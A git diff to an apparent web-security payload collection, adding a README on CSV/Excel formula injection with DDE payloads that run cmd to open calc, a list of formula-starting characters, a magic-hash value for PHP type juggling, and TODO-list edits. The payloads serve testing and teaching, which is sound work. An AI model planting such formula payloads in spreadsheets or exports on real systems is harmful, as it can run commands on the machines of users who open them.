diff --git a/CSV injection/README.md b/CSV injection/README.md
index c707ab4..69a64c3 100644
--- a/CSV injection/README.md	
+++ b/CSV injection/README.md	
@@ -1,12 +1,29 @@
-# Title
-Lorem	
+# CSV Excel formula injection
+Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.	
 
-## Vuln
+## Exploit
+
+Basic exploit with Dynamic Data Exchange 
+```
+DDE ("cmd";"/C calc";"!A0")A0
+@SUM(1+1)*cmd|' /C calc'!A0
+
+Technical Details of the above payload:
+cmd is the name the server can respond to whenever a client is trying to access the server
+/C calc is the file name which in our case is the calc(i.e the calc.exe)
+!A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data
 
 ```
-Code
+
+Any formula can be started with
+```
+=
++
+–
+@
 ```
 
 ## Thanks to
-* Lorem
-* Ipsum
\ No newline at end of file
+* https://owasp.org/index.php/CSV_Excel_Macro_Injection
+* https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection
+*https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
\ No newline at end of file
diff --git a/PHP juggling type/README.md b/PHP juggling type/README.md
index 7386e90..99ade0a 100644
--- a/PHP juggling type/README.md	
+++ b/PHP juggling type/README.md	
@@ -18,7 +18,7 @@ var_dump('0xABCdef'       == '     0xABCdef');
 | Hash | “Magic” Number / String    | Magic Hash                                    | Found By      |
 | ---- | -------------------------- |:---------------------------------------------:| -------------:|
 | MD5  | 240610708                  | 0e462097431906509019562988736854              | Michal Spacek |
-| SHA1 | col 3 is                   | 0e07766915004133176347055865026311692244      | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
+| SHA1 | 10932435112                | 0e07766915004133176347055865026311692244      | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
 
 
 ## Thanks to
diff --git a/README.md b/README.md
index 4f6a578..0379aa5 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,6 @@ A list of usefull payloads and bypasses for Web Application Security
 
 TODO:
 * PHP Serialization
-* CSV Injection
 
 To improve:
 * RCE
@@ -15,9 +14,6 @@ To improve:
 * Traversal Directory
 * XSS
 * PHP Include
+* CSV Injection
 
-TODO v2:
-* Remove "_" in dir name
-* Add CVE : Hearbleed and ShellShock ?
-
-# /!\ Work in Progress : 40%
+# /!\ Work in Progress : 70%